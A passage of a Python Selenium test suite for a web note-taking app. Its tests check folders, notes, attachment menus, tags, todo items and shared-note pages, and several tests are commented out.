self.assertEqual(first_note.text.upper(), attach_fname+" 233.431 KB")
open_close_attach_button.click()
self.assertFalse(attaches_menu.is_displayed())
self._remove_item_without_ui(data[0]["global_id"])
def test_open_close_images_menu(self):
note_text = u"test text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
note_id = note_data["global_id"]
attach_fname = 'attach-1.jpg'
fixture_file = self.check_fixture_file(attach_fname)
attach = self._do_attachment_upload(fixture_file=fixture_file,
note_id=note_id)
text_with_attach = '<p>some text</p>'
note_data_2 = self._create_note_without_ui(
text=text_with_attach,
global_id=note_data["global_id"]
)["body"]["notes"]
time.sleep(4)
created_note = self.driver.find_element_by_id(note_id)
created_note.click()
edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
edit_button.click()
self.driver.maximize_window()
menu_button = self.driver.find_element_by_css_selector('#mce_17 button')
menu_button.click()
images_menu = self.driver.find_element_by_css_selector('#imagesList')
self.assertTrue(images_menu.is_displayed())
menu_button.click()
self.assertFalse(images_menu.is_displayed())
menu_button.click()
close_from_itself_button = self.driver.find_element_by_css_selector('#imagesList .remove_select')
close_from_itself_button.click()
self.assertFalse(images_menu.is_displayed())
self._remove_item_without_ui(folder_data["global_id"])
def test_download_attach(self):
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-1.jpg')
open_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
open_attach_button.click()
attach = self.driver.find_element_by_css_selector('.attachments_names a')
self.assertEqual('_blank', attach.get_attribute('target'))
self.assertEqual('attach-1.jpg', attach.get_attribute('download'))
self.assertEqual('attach-1.jpg', attach.get_attribute('download'))
self.assertIn('attach-1.jpg', attach.get_attribute('href'))
self._remove_item_without_ui(data[1]["global_id"])
def test_refresh_noteslist_when_add_todo(self):
note_text = u"test text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
self.driver.implicitly_wait(4000)
folder = self._select_folder_by_name(folder_name)
folder.click()
self.driver.implicitly_wait(2000)
note1_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
parent_id = folder_data["global_id"]
)["body"]["notes"][0]
note2_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
parent_id = folder_data["global_id"]
)["body"]["notes"][0]
self.driver.implicitly_wait(2000)
folder.click()
self.driver.implicitly_wait(6000)
second_note = self.driver.find_element_by_id(note1_data["global_id"])
second_note.click()
self.driver.implicitly_wait(2000)
todo_open_menu = self.driver.find_element_by_css_selector('.notes_content .todo')
todo_open_menu.click()
self.driver.implicitly_wait(1000)
input_todo = self.driver.find_element_by_css_selector('.todo_text')
input_todo.send_keys("todo_example")
add_todo = self.driver.find_element_by_css_selector('.notes_content .btn-primary')
add_todo.click()
time.sleep(2)
expected_first_note = self.driver.find_element_by_css_selector('.first')
self.assertEqual(expected_first_note.get_attribute('id'), note1_data["global_id"])
self._remove_item_without_ui(folder_data["global_id"])
def test_scrolls_in_share(self):
folder_name = self._get_random_name(12)
result = self._create_folder_without_ui(folder_name)
time.sleep(3)
self.driver.refresh()
self.assertIsNotNone(result)
folder = result["body"]["notes"][0]
self.assertIsNotNone(folder)
selected_folder = self._select_folder_by_name(folder['title'])
selected_folder.click()
time.sleep(2)
text = '<div><div style="width:5000px; height:10000px; border:1px solid;">loreup ipsum</div></div>'
note = self._create_note_without_ui(text=text, parent_id=folder["global_id"], title='1234')["body"]["notes"][0]
share_result = self._get_note_url_without_ui(note["global_id"])["body"]["notes_shared"][0][note["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
self.driver.get(self.url)
def test_tools_menu(self):
tools = self.driver.find_element_by_css_selector('#toolsButton .jq-selectbox__select-text')
tools.click()
time.sleep(2)
two = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:first-child li:nth-child(2)")
five = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:first-child li:nth-child(5)")
self.assertTrue(two.is_displayed())
self.assertTrue(five.is_displayed())
direct = self.driver.find_element_by_css_selector(".jq-selectbox__dropdown.tools_menu ul:nth-child(2)")
self.assertTrue(direct.is_enabled())
def test_short_url(self):
self._get_shared_link()
short_url = self.driver.find_element_by_css_selector(".short_url")
short_url.click()
time.sleep(5)
header = self.driver.find_element_by_css_selector(".modal-header h3").text
self.assertEqual(header, "Short Link:")
link_shared = self.driver.find_element_by_css_selector(".modal-body.ng-binding input").get_attribute("value")
self.assertNotEqual(link_shared, "")
self.assertNotEqual(link_shared, "undefined")
self._default_state()
def test_for_save_to_my_nimbus(self):
attach_name = self._get_shared_link()
time.sleep(3)
save_to_nimbus = self.driver.find_element_by_css_selector(".btn.blue.save_to_my")
save_to_nimbus.click()
time.sleep(5)
header = self.driver.find_element_by_css_selector(".modal-header h3").text
self.assertEqual(header, "Copying:")
link_shared = self.driver.find_element_by_css_selector(".modal-body.ng-binding").text
self.assertNotEqual(link_shared, "")
self.assertNotEqual(link_shared, "undefined")
self._default_state()
open_close_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
open_close_attach_button.click()
count_attaches = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
self.assertEqual(count_attaches, "1")
attach_obj_after_save = self.driver.find_element_by_css_selector('.head_notes .attaches_list li:first-child a')
attach_name_after_save = attach_obj_after_save.get_attribute('download')
self.assertIn( attach_name, attach_name_after_save.upper())
def test_scroll_when_view_note(self):
folder_name = self._get_random_name(12)
result = self._create_folder_without_ui(folder_name)
time.sleep(3)
self.assertIsNotNone(result)
folder = result["body"]["notes"][0]
self.assertIsNotNone(folder)
time.sleep(2)
text = '<div><div style="width:5000px; height:10000px; border:1px solid;">loreup ipsum</div></div>'
note = self._create_note_without_ui(title='qwerty', text=text, parent_id=folder["global_id"])["body"]["notes"][0]
self.driver.refresh()
selected_folder = self._select_folder_by_name(folder['title'])
selected_folder.click()
time.sleep(5)
self.driver.find_element_by_id(note["global_id"]).click()
time.sleep(5)
scroll = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspVerticalBar")
scroll_h = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspHorizontalBar")
self.assertTrue(scroll.is_displayed())
self.assertTrue(scroll_h.is_displayed())
time.sleep(5)
self._del_folder_without_ui(folder["global_id"])
def test_show_or_hide_top_menu_in_editor(self):
self._create_folder_without_ui("editorTopMenu")
self.driver.refresh()
time.sleep(10)
editorFolder = self._select_folder_by_name("editorTopMenu")
editorFolder.click()
time.sleep(5)
new_note_button = self.driver.find_element_by_css_selector(".btn-wrapper button")
new_note_button.click()
time.sleep(5)
top = self.driver.find_element_by_css_selector(".show_panel_button")
top.click()
time.sleep(5)
top_menu_one = self.driver.find_element_by_css_selector(".sub_header.edit_note.edit_mode")
top_menu_two = self.driver.find_element_by_css_selector(".main.edit_mode #scrollbarY4.custom_scroll.edit_note .tag_line:first-child")
self.assertFalse(top_menu_one.is_displayed())
self.assertFalse(top_menu_two.is_displayed())
time.sleep(5)
top = self.driver.find_element_by_css_selector(".show_panel_button")
top.click()
time.sleep(5)
top_menu_one = self.driver.find_element_by_css_selector(".sub_header.edit_note.edit_mode")
top_menu_two = self.driver.find_element_by_css_selector(".main.edit_mode #scrollbarY4.custom_scroll.edit_note .tag_line:first-child")
self.assertTrue(top_menu_one.is_displayed())
self.assertTrue(top_menu_two.is_displayed())
# правити
def test_count_attaches(self):
attach_fname = '114-1024.JPG'
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = '114-1024.JPG')
open_close_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
count_attaches = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
self.assertEqual(count_attaches, "1")
open_close_attach_button.click()
delete_attach_button = self.driver.find_element_by_css_selector('.notes_content .attaches_list li:first-child .delete_attach_btn')
delete_attach_button.click()
time.sleep(2)
count_attaches = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view span').text
self.assertEqual(count_attaches, "0")
self._remove_item_without_ui(data[0]["global_id"])
def test_close_attach_menu_from_itself(self):
note_text = "<p>some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
if self.driver.find_element_by_css_selector('.notes div').is_displayed():
self.driver.find_element_by_css_selector('.notes span').click()
note_id = note_data["global_id"]
attach_fname = '114-1024.JPG'
fixture_file = self.check_fixture_file(attach_fname)
attach = self._do_attachment_upload(fixture_file=fixture_file,
note_id=note_id)
text_with_attach = '<p>some text</p>'
note_data_2 = self._create_note_without_ui(
text=text_with_attach,
global_id=note_data["global_id"]
)["body"]["notes"]
time.sleep(4)
created_note = self.driver.find_element_by_id(note_id)
created_note.click()
time.sleep(3)
open_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
open_attach_button.click()
attaches_menu = self.driver.find_element_by_css_selector('.notes_content .attaches_menu')
self.assertTrue(attaches_menu.is_displayed())
self.driver.maximize_window()
close_attach_button = self.driver.find_element_by_css_selector('.notes_content .remove_select')
close_attach_button.click()
self.assertFalse(attaches_menu.is_displayed())
self._remove_item_without_ui(folder_data["global_id"])
def test_click_to_open_products_menu(self):
data = self._create_folder_and_note_with_image_attach(in_list = True)
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
time.sleep(2)
get_nimbus = self.driver.find_element_by_css_selector(".user_services__select")
get_nimbus.click()
time.sleep(1)
product_menu = self.driver.find_element_by_css_selector(".products_menu li:first-child a").size
height = 55
self.assertEqual(product_menu['height'], height)
self._remove_item_without_ui(data[1]["global_id"])
self._default_state()
def test_refresh_note_tags_list(self):
note_text = "<p>some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(2)
edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
edit_button.click()
select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
select.click()
time.sleep(1)
tag_name = self._get_random_name(4)
select.send_keys(tag_name)
add_tag_button = self.driver.find_element_by_css_selector('li.no-results a')
add_tag_button.click()
my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
self.assertTrue(my_selected_tag.text == tag_name)
self.assertTrue(my_selected_tag.is_displayed())
save_note_button = self.driver.find_element_by_css_selector('button.save_change')
save_note_button.click()
time.sleep(6)
my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
self.assertTrue(my_selected_tag.text == tag_name)
self.assertTrue(my_selected_tag.is_displayed())
self._remove_item_without_ui(folder_data["global_id"])
def test_hide_selected_tag_from_tagslist(self):
note_text = "<p>some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(2)
edit_button = self.driver.find_element_by_css_selector('.head_note a.edit')
time.sleep(2)
edit_button.click()
list_with_not_already_selected_tag = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
count_with_not_already_selected_tag = list_with_not_already_selected_tag.__len__()
select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
select.click()
time.sleep(1)
select_tag = self.driver.find_element_by_css_selector('.tag_line_search ul.chzn-results li:first-child')
select_tag.click()
time.sleep(2)
list_with_already_selected_tag = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
self.assertEqual(count_with_not_already_selected_tag, list_with_already_selected_tag.__len__())
self._remove_item_without_ui(folder_data["global_id"])
def test_no_tags_dublicates_in_tags_list(self):
note_text = "<p>some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(5)
edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
edit_button.click()
list_with_not_already_selected_tag = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
count_with_not_already_selected_tag = list_with_not_already_selected_tag.__len__()
select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
select.click()
time.sleep(1)
tag_name = self._get_random_name(4)
select.send_keys(tag_name)
add_tag_button = self.driver.find_element_by_css_selector('li.no-results a')
add_tag_button.click()
list_with_already_selected_tag = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
count_with_already_selected_tag = list_with_already_selected_tag.__len__()
self.assertEqual(count_with_not_already_selected_tag+1, count_with_already_selected_tag)
my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
self.assertTrue(my_selected_tag.text == tag_name)
self.assertTrue(my_selected_tag.is_displayed())
note_link = self.driver.find_element_by_css_selector('.tag_line_search .note_link')
note_link.click()
select = self.driver.find_element_by_css_selector('.tag_line_search ul .search-field input')
select.click()
time.sleep(1)
tags_list_after_close_open_it = self.driver.find_elements_by_css_selector(".tag_line_search ul.chzn-results li")
count_tags_list_after_close_open_it = tags_list_after_close_open_it.__len__()
my_selected_tag = self.driver.find_element_by_css_selector(".tag_line_search ul.chzn-choices li.search-choice:first-child")
self.assertEqual(count_with_not_already_selected_tag+1, count_tags_list_after_close_open_it)
self.assertEqual(count_with_already_selected_tag, count_tags_list_after_close_open_it)
self.assertTrue(my_selected_tag.text == tag_name)
self.assertTrue(my_selected_tag.is_displayed())
self._remove_item_without_ui(folder_data["global_id"])
def _open_share_individuals_window(self, from_context = False):
if from_context:
my_new_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
self._context_click(my_new_folder)
context_share_individuals_button = self.driver.find_element_by_css_selector('.dropdown-menu li:nth-last-child(2) a')
context_share_individuals_button.click()
else:
share_individuals_button = self.driver.find_element_by_css_selector('.action_buttons.head_note li:nth-child(2)')
share_individuals_button.click()
def test_updating_text_note_after_saving(self):
folder_name = self._get_random_name(12)
result = self._create_folder_without_ui(folder_name)
time.sleep(3)
self.driver.refresh()
self.assertIsNotNone(result)
folder = result["body"]["notes"][0]
self.assertIsNotNone(folder)
selected_folder = self._select_folder_by_name(folder['title'])
selected_folder.click()
time.sleep(2)
file = open("./fixtures/big_text.txt", "r")
text = file.read()
file.close()
note = self._create_note_without_ui(text=text, parent_id=folder["global_id"], title='1234')["body"]["notes"][0]
time.sleep(4)
selected_folder.click()
self.driver.refresh()
time.sleep(4)
edit_button = self.driver.find_element_by_css_selector('.head_note .edit')
edit_button.click()
time.sleep(2)
editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
self.driver.switch_to_frame(editor_frame)
body = self.driver.find_element_by_css_selector("body")
body.click()
inputed_text = self._get_random_name(12)
body.send_keys(inputed_text)
self.driver.switch_to_default_content()
save_button = self.driver.find_element_by_id('save_change_main')
time.sleep(1)
save_button.click()
time.sleep(6)
self.driver.refresh()
time.sleep(4)
note_text = self.driver.find_element_by_css_selector("#all_text p")
self.assertNotEqual(note_text.text().find(inputed_text), -1)
# def test_add_tag_with_enter_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(2)
#
# edit_button = self.driver.find_element_by_css_selector(".head_note a.edit")
# edit_button.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form input")
# time.sleep(5)
# text = self._get_random_name(15)
# select.send_keys(text)
# time.sleep(3)
# ActionChains(self.driver).send_keys_to_element(select, Keys.ENTER).perform()
# time.sleep(2)
# save = self.driver.find_element_by_css_selector("#save_change_main")
# save.click()
# time.sleep(5)
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# ActionChains(self.driver).context_click(first_note).perform()
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# ActionChains(self.driver).click(dropdown).perform()
# selectinfull = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form .chzn-choices li:nth-child(2)")
# self.assertTrue(selectinfull.is_enabled())
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_add_tag_in_current_list_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(3)
#
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).context_click(first_note).perform()
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# dropdown.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form input")
# select.click()
# time.sleep(3)
# select_tag = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form .chzn-results li:first-child")
# selected_tag_name = select_tag.text
# select_tag.click()
# time.sleep(5)
# selectinfull = self._get_selectInFull()
# self.assertTrue(selectinfull.is_enabled())
# self.assertEqual(selectinfull.text, selected_tag_name)
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_add_tag_with_button_inFullWindow(self):
# note_text = u"Some text"
# folder_name = self._get_random_name(16)
# folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
# self.driver.refresh()
# time.sleep(2)
# folder = self._select_folder_by_name(folder_name)
# folder.click()
# time.sleep(2)
# note_data = self._create_note_without_ui(
# title = u"test_note",
# text = note_text,
# global_id = self._get_random_name(16),
# parent_id=folder_data["global_id"]
# )["body"]["notes"][0]
# time.sleep(4)
# folder.click()
# self.driver.refresh()
# time.sleep(2)
#
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).context_click(first_note).perform()
# time.sleep(1)
# ActionChains(self.driver).context_click(first_note).perform()
# time.sleep(1)
# dropdown = self.driver.find_element_by_css_selector(".dropdown-menu li:nth-child(3)")
# time.sleep(1)
# dropdown.click()
# time.sleep(5)
# select = self.driver.find_element_by_css_selector("div .tag_line:nth-child(2) form input")
# text = self._get_random_name(14)
# select.send_keys(text)
# time.sleep(3)
# click_on_plus = self.driver.find_element_by_css_selector("#addThisTag")
# click_on_plus.click()
# time.sleep(5)
# selectinfull = self._get_selectInFull()
# self.assertTrue(selectinfull.is_enabled())
# self._remove_item_without_ui(folder_data["global_id"])
#
# def test_for_targetBlank(self):
# self._create_folder_without_ui("target_Blank")
# self.driver.refresh()
# time.sleep(5)
# click_folder = self._select_folder_by_name("target_Blank")
# click_folder.click()
# time.sleep(3)
# new_note_button = self.driver.find_element_by_css_selector(".btn-wrapper button")
# new_note_button.click()
# time.sleep(3)
# editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
# self.driver.switch_to_frame(editor_frame)
# body = self.driver.find_element_by_css_selector("body")
# time.sleep(5)
# body.send_keys("https://www.google.com")
# ActionChains(self.driver).send_keys_to_element(body, Keys.ENTER).perform()
# time.sleep(4)
# self.driver.switch_to_default_content()
# save_button = self.driver.find_element_by_id('save_change_main')
# save_button.click()
# time.sleep(2)
# self.driver.refresh()
# time.sleep(10)
# click_folder = self._select_folder_by_name("target_Blank")
# click_folder.click()
# time.sleep(5)
# first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
# time.sleep(2)
# ActionChains(self.driver).click(first_note).perform()
# time.sleep(2)
# share = self.driver.find_element_by_css_selector(".heading .action_buttons.head_note .share")
# share.click()
# time.sleep(5)
# link = self.driver.find_element_by_css_selector("#link_text_show")
# link_text = link.get_attribute("value")
# ok = self.driver.find_element_by_css_selector(".modal-footer button.btn.btn-success")
# ok.click()
# self.driver.get(link_text)
# time.sleep(10)
# note_text_link = self.driver.find_element_by_css_selector("#note_text_share p a")
# self.assertEqual(note_text_link.get_attribute("target"), "_blank")
# self._default_state()
# def test_saving_in_todo_list_when_add_todo(self):
# default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
# default_folder.click()
# time.sleep(1)
# default_folder.click()
# time.sleep(1)
# default_folder_name = self.driver.find_element_by_css_selector('.notes_content .sort_folder .jq-selectbox__select-text').text
# self.assertEqual('My Notes', default_folder_name)
#
# data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
#
# default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
# default_folder.click()
# time.sleep(1)
# self.assertEqual('My Notes', default_folder_name)
#
# new_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
# new_folder.click()
# time.sleep(2)
# new_folder_name = self.driver.find_element_by_css_selector('.notes_content .sort_folder .jq-selectbox__select-text').text
# self.assertEqual(data[1]["title"], new_folder_name)
#
# self._remove_item_without_ui(data[1]["global_id"])
def test_check_google_analist_in_share_and_mine(self):
data = self._create_folder_and_note_with_image_attach(in_list = False, attach_name = 'attach-2.png')
google_analist = self.driver.find_element_by_css_selector("script[src='http://www.google-analytics.com/ga.js']")
self.assertTrue(google_analist.is_enabled())
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
google_analist = self.driver.find_element_by_css_selector("script[src='http://www.google-analytics.com/ga.js']")
self.assertTrue(google_analist.is_enabled())
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_check_show_hide_attach_menu_in_share(self):
data = self._create_folder_and_note_with_image_attach(in_list = False)
note_id= data[0]["global_id"]
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][note_id]
self.driver.get(self.url.replace("/client/", "") + share_result)
attach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
self.assertFalse(attach_menu.is_displayed())
attach_fname = '114-1024.JPG'
fixture_file = self.check_fixture_file(attach_fname)
attach = self._do_attachment_upload(fixture_file= fixture_file,
note_id= note_id, in_list="True")
self.driver.refresh()
time.sleep(2)
attach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
self.assertTrue(attach_menu.is_displayed())
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_check_target_of_attach_item(self):
data = self._create_folder_and_note_with_image_attach(in_list = True)
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
attach_item = self.driver.find_element_by_css_selector(".attaches_view_list .attach-download a")
self.assertEqual(attach_item.get_attribute("target"), '_blank')
self.assertEqual(attach_item.get_attribute("ng-target"), '_blank')
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_check_img_for_every_attach_item(self):
data = self._create_folder_and_note_with_image_attach(in_list = True)
attach_fname = ['attach-autio-1.mp3', 'attach-archive-1.zip', 'attach-file-1.elf', 'attach-video-1.flv']
for i in attach_fname:
fixture_file = self.check_fixture_file(i)
attach = self._do_attachment_upload(fixture_file = fixture_file,
note_id = data[0]["global_id"],
in_list = "True")
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
attach_item = self.driver.find_elements_by_css_selector(".attaches_view_list .attach-download a img")
index = 0
for i in attach_item:
pattern = 'http://notes.everhelper.me/client/static/img/iconsOfAttachmentsTypes/'
img_name = ['video_attach.png', 'archive_attach.png', 'audio_attach.png', 'file_attach.png', 'image_attach.png']
for name in img_name:
if pattern+name == i.get_attribute('src'):
index = index + 1
break
self.assertEqual(index, 5)
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def _create_folder_and_note_with_image_attach(self, in_list = False, attach_name = '114-1024.JPG',
title = u'Default Title'):
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title= title,
parent_id= folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
note_id = note_data["global_id"]
fixture_file = self.check_fixture_file(attach_name)
attach = self._do_attachment_upload(fixture_file=fixture_file,
note_id=note_id, in_list=in_list)
attach_text = ""
if attach['body']['attachment'] is None:
self.assertIsNotNone(attach['body']['attachment'], attach['body']['errorMessage'])
if in_list == False:
attach_text = '<img src="#attacheloc:'+attach['body']['attachment']['global_id']+'"/>'
text_with_attach = '<p> some text'+ attach_text +'</p>';
note_data_2 = self._create_note_without_ui(
title= title,
text= text_with_attach,
global_id= note_data["global_id"],
)["body"]["notes"]
time.sleep(4)
created_note = self.driver.find_element_by_id(note_id)
created_note.click()
time.sleep(2)
return [note_data, folder_data]
def test_check_hide_attach_menu_when_in_list_false(self):
data = self._create_folder_and_note_with_image_attach(in_list = False, attach_name = 'attach-2.png')
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
atach_menu = self.driver.find_element_by_css_selector('.attaches_menu')
self.assertFalse(atach_menu.is_displayed())
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_create_new_tab_to_click_on_img(self):
data = self._create_folder_and_note_with_image_attach(in_list = False, attach_name = 'attach-2.png')
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
image = self.driver.find_element_by_css_selector("#note_text_share img")
image.click()
self._default_state()
self._remove_item_without_ui(data[1]["global_id"])
def test_saving_in_todo_list_when_add_todo(self):
todo = "todo_example"
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
todo_open_menu = self.driver.find_element_by_css_selector('.notes_content .todo')
todo_open_menu.click()
self.driver.implicitly_wait(1000)
input_todo = self.driver.find_element_by_css_selector('.todo_text')
input_todo.send_keys(todo)
add_todo = self.driver.find_element_by_css_selector('.notes_content .btn-primary')
add_todo.click()
time.sleep(2)
added_todo = self.driver.find_element_by_css_selector('form:last-child p:nth-child(2)')
self.assertTrue(added_todo.is_displayed())
self.assertEqual(todo, added_todo.text)
self._remove_item_without_ui(data[1]["global_id"])
def test_move_note_to_another_folder(self):
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = 'attach-2.png')
default_folder = self.driver.find_element_by_css_selector('.sub li[id="default"]')
time.sleep(2)
default_folder.click()
time.sleep(2)
count_notes = self.driver.find_elements_by_css_selector('.notes_list li').__len__()
new_folder = self.driver.find_element_by_css_selector('.sub li:last-child')
new_folder.click()
self.driver.get(self.url)
time.sleep(5)
folders_list = self.driver.find_element_by_css_selector('.sort_folder span:first-child .jq-selectbox__trigger-arrow')
time.sleep(1)
folders_list.click()
time.sleep(2)
default_folder_in_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__dropdown ul li:last-child')
default_folder_in_list.click()
time.sleep(3)
folders_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__trigger-arrow')
folders_list.click()
time.sleep(3)
default_folder_in_list = self.driver.find_element_by_css_selector('.notes_content .jq-selectbox__dropdown ul li:last-child')
default_folder_in_list.click()
time.sleep(1)
count_notes_after_moving = self.driver.find_elements_by_css_selector('.notes_list li').__len__()
self.assertEqual(count_notes+1, count_notes_after_moving)
self._remove_item_without_ui(data[1]["global_id"])
def test_check_download_atribute_on_display_name(self):
attach_name = '114-1024.JPG'
data = self._create_folder_and_note_with_image_attach(in_list = True)
open_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
open_attach_button.click()
download_attr_a = self.driver.find_element_by_css_selector('.notes_content .attachments_names a').get_attribute('download')
self.assertEqual(download_attr_a, attach_name)
share_result = self._get_note_url_without_ui(data[0]["global_id"])["body"]["notes_shared"][0][data[0]["global_id"]]
self.driver.get(self.url.replace("/client/", "") + share_result)
